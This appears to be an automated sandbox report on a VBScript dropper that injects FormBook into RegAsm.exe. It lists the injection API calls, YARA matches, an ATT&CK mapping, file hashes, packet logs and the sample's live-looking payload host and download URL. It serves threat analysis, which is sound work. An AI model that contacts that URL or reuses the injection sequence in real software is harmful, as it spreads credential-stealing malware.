          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB765 mov eax, dword ptr fs:[00000030h]10_2_02EEB765
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF8770 mov eax, dword ptr fs:[00000030h]10_2_02EF8770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F74755 mov eax, dword ptr fs:[00000030h]10_2_02F74755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32750 mov eax, dword ptr fs:[00000030h]10_2_02F32750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32750 mov eax, dword ptr fs:[00000030h]10_2_02F32750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7E75D mov eax, dword ptr fs:[00000030h]10_2_02F7E75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F03740 mov eax, dword ptr fs:[00000030h]10_2_02F03740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F03740 mov eax, dword ptr fs:[00000030h]10_2_02F03740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F03740 mov eax, dword ptr fs:[00000030h]10_2_02F03740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC3749 mov eax, dword ptr fs:[00000030h]10_2_02FC3749
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF0750 mov eax, dword ptr fs:[00000030h]10_2_02EF0750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2674D mov esi, dword ptr fs:[00000030h]10_2_02F2674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2674D mov eax, dword ptr fs:[00000030h]10_2_02F2674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2674D mov eax, dword ptr fs:[00000030h]10_2_02F2674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FCB73C mov eax, dword ptr fs:[00000030h]10_2_02FCB73C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FCB73C mov eax, dword ptr fs:[00000030h]10_2_02FCB73C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FCB73C mov eax, dword ptr fs:[00000030h]10_2_02FCB73C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FCB73C mov eax, dword ptr fs:[00000030h]10_2_02FCB73C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6C730 mov eax, dword ptr fs:[00000030h]10_2_02F6C730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F25734 mov eax, dword ptr fs:[00000030h]10_2_02F25734
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2273C mov eax, dword ptr fs:[00000030h]10_2_02F2273C
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Benign windows process drops PE files
          Source: C:\Windows\System32\wscript.exeFile created: temp_executable.exe.0.drJump to dropped file
          .NET source code references suspicious native API functions
          Source: temp_executable.exe.0.dr, ProcessExecutor.csReference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
          Source: temp_executable.exe.0.dr, ProcessExecutor.csReference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
          Source: temp_executable.exe.0.dr, ProcessExecutor.csReference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
          Allocates memory in foreign processes
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CE3008Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeQueries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information221
          Scripting          		Valid Accounts1
          Native API          		221
          Scripting          		311
          Process Injection          		1
          Disable or Modify Tools          		OS Credential Dumping21
          Security Software Discovery          		Remote Services11
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		41
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)311
          Process Injection          		Security Account Manager41
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Deobfuscate/Decode Files or Information          		NTDS1
          File and Directory Discovery          		Distributed Component Object ModelInput Capture3
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information          		LSA Secrets12
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Timestomp          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TRANSFERENCIAS.vbs11%ReversingLabsScript-WScript.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\temp_executable.exe100%AviraTR/Dropper.Gen
          C:\Users\user\AppData\Local\Temp\temp_executable.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          transfer.adttemp.com.br5%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://transfer.adttemp.com.br5%VirustotalBrowse
          https://transfer.adttemp.com.br4%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          transfer.adttemp.com.br
          		104.196.109.209
          		truefalseunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://transfer.adttemp.com.br/qbDh2/sirdeeeeee.txtfalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://transfer.adttemp.com.brtemp_executable.exe, 00000008.00000002.1315543440.0000000002BF3000.00000004.00000800.00020000.00000000.sdmptrueunknown
            http://transfer.adttemp.com.brdtemp_executable.exe, 00000008.00000002.1315543440.0000000002BF3000.00000004.00000800.00020000.00000000.sdmptrue
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametemp_executable.exe, 00000008.00000002.1315543440.0000000002BD5000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://transfer.adttemp.com.brtemp_executable.exe, 00000008.00000002.1315543440.0000000002BE6000.00000004.00000800.00020000.00000000.sdmptrueunknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              104.196.109.209
              		transfer.adttemp.com.brUnited States
              		15169GOOGLEUSfalse

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1525551
              Start date and time:2024-10-04 11:33:15 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 23s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:17
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:TRANSFERENCIAS.vbs
              Detection:MAL
              Classification:mal100.troj.expl.evad.winVBS@7/2@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 27
              • Number of non-executed functions: 239
              Cookbook Comments:
              • Found application associated with file extension: .vbs

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              05:34:13API Interceptor1x Sleep call for process: temp_executable.exe modified
              06:56:07API Interceptor3x Sleep call for process: RegAsm.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousCredential FlusherBrowse
              • 104.196.109.209
              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
              • 104.196.109.209
              TRANSFERENCIAS.vbsGet hashmaliciousFormBookBrowse
              • 104.196.109.209
              FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
              • 104.196.109.209
              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
              • 104.196.109.209
              QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
              • 104.196.109.209
              Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
              • 104.196.109.209
              Transfer.lnkGet hashmaliciousHTMLPhisherBrowse
              • 104.196.109.209
              Pago1032024.lnkGet hashmaliciousUnknownBrowse
              • 104.196.109.209
              Transfer.lnkGet hashmaliciousHTMLPhisherBrowse
              • 104.196.109.209

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\temp_executable.exe.log

              Download File
              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):847
              Entropy (8bit):5.345615485833535
              Encrypted:false
              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
              MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
              SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
              SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
              SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

              C:\Users\user\AppData\Local\Temp\temp_executable.exe

              Download File
              Process:C:\Windows\System32\wscript.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):55296
              Entropy (8bit):6.034782857304096
              Encrypted:false
              SSDEEP:768:zeHFvMAFGdyKIsuKzUFTL3XufLnPw/PFbFQSuBVV9fo1:UMo6tUFTL3XufLnPw/PFuXVG1
              MD5:1774855B0E8A12C20A7A321D995FA17A
              SHA1:74B1FD8854B7FAACBAF7C7494C2A02C6A40A4C82
              SHA-256:6AEF027CFB8EA2F068E97EE8C8CCB7C0DF7FD7FB6BCBA4E266FA28AA16D0CFBE
              SHA-512:9AC360FDBB3A76F7F4DE7D292BB87BCAB9F70CE9FEE9B6A7DC6C588ACF2B1ABBFFFCA86CE7DEA6F175C31A97DEF5A2EAC29049E5569786F85D6CDC3A1E566B35
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F.................................... ........@.. .......................`............`.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata..............................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:ASCII text, with very long lines (65486), with CRLF line terminators
              Entropy (8bit):4.442364485961963
              TrID:
              • Visual Basic Script (13500/0) 100.00%
              File name:TRANSFERENCIAS.vbs
              File size:210'557 bytes
              MD5:36785fe79d41b73fae95c26d6f64186d
              SHA1:9a2d9296673086220e25c622c059ba1a7b65dd89
              SHA256:434e6d3b448f48a98ef5dc955d51c05b8e136c40fda5f6b8cff698eab989ad07
              SHA512:ec5bd90fde3d895e3bd385d699f4de5a369edacc7e3dc7be21a83c4507851201d063ed5d266347f4ff0b32a525fdd62eff41ba50783173826901df701275623f
              SSDEEP:3072:WNBInRVWZdK7bP/UnsNVl+5NBInRVWZdK7bP/UnsNVl+jmYp:0FDsNVl+3FDsNVl+jmYp
              TLSH:6F249423DB05AA0445870A7CCB4957277C6C95B8F2F9EED4EAF6582058F8732616B3CC
              File Content Preview:' Main Script Logic for Processing Base64 Data....' Initialize the Base64-encoded string (Replace "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@

              File Icon

              Icon Hash:68d69b8f86ab9a86

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 4, 2024 11:34:13.368015051 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:13.368072033 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:13.368156910 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:13.400599957 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:13.400638103 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.018481970 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.018577099 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.024457932 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.024482012 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.024719000 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.075958967 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.098454952 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.139406919 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.212099075 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.212250948 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.212306976 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.212316990 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.212353945 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.212376118 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.212795019 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.212846041 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.212860107 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.212909937 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.230537891 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.230623960 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.300615072 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.300698996 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.300971985 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.301032066 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.301110983 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.301162958 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.303129911 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.303195953 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.304902077 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.304934025 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.304980040 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.305007935 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.305027962 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.319947004 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.320022106 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.320056915 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.362750053 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.362865925 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.362883091 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.389475107 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.389552116 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.389589071 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.390722990 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.390733957 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.390772104 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.390777111 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.390789032 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.390824080 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.391769886 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.391777992 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.391820908 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.391832113 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.391843081 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.391861916 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.391871929 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.391880035 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.391905069 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.391927958 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.391937971 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.391959906 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.392487049 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.392533064 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.392534971 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.392544985 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.392585039 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.393347025 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.393381119 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.393409967 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.393429041 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.393589973 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.407674074 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.407731056 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.407766104 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.407799959 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.407830000 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.407831907 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.407879114 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.407887936 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.407936096 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.408051968 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.450936079 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.477896929 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.477911949 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.478012085 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.478033066 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.478080034 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.478252888 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.478261948 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.478316069 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.478324890 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.478382111 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.478897095 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.478969097 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.478976011 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.479788065 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.479871988 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.479880095 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.480036020 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.480113029 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.480120897 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.480895996 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.480997086 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.481005907 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.481811047 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.481869936 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.481878996 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.482762098 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.482835054 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.482842922 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.483553886 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.483613968 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.483623981 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.496344090 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.496438026 CEST49700443192.168.2.7104.196.109.209
